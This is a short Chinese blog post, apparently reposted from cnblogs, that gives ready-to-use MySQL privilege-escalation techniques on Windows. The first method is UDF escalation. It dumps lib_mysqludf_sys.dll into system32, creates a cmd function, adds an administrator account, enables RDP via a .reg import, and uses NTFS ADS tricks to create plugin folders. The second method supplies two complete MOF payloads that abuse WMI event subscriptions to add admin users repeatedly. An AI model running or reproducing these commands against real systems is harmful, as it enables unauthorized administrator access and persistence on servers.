标签:style blog http io ar color sp strong 文件
1、利用sqlmap的UDF提权
1.找个可写的目录上传lib_mysqludf_sys.dll,根据mysql的版本导入到windows\system32或者mysql的\lib\plugin目录下
select @@plugin_dir
select load_flie(‘C:\\RECYCLER\\lib_mysqludf_sys.dll‘) into dumpfile ‘C:\\windows\\system32\\lib_mysqludf_sys.dll‘
2.创建函数执行命令
create function cmd returns string soname ‘lib_mysqludf_sys.dll‘; select cmd(‘net user mrxt 123456 /add‘); select cmd(‘net localgroup administrators mrxt /add‘); select cmd(‘regedit /s C:\\3389.reg‘); drop function cmd; delete from mysql.func where name=‘cmd‘
3.某些情况下遇到Can‘t open shared library的情况,需要把DLL导出到lib\plugin目录下才可以,如果不存在,则可以用NTFS ADS流来创建文件夹的方法
select ‘dll file‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION‘; //创建lib目录 select ‘dll file‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION‘; //创建plugin目录
2.MOF提权
找个可写目录上传MOF文件,比如C:\RECYCLER\
这个payload利用的是WScript.Shell
#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
这个payload利用的是User.Shell
#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
然后导出到c:/windows/system32/wbem/mof/目录下
select load_file(‘C:\\wmpub\\nullevt.mof‘) into dumpfile ‘c:\\windows\\system32\\wbem\\mof\\nullevt.mof‘
这个方法会不停的添加用户,执行net stop winmgmt 然后删除文件即可
参考文章:
http://www.waitalone.cn/mysql-tiquan-summary.html
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/
标签:style blog http io ar color sp strong 文件
原文地址:http://www.cnblogs.com/hackxt/p/4131124.html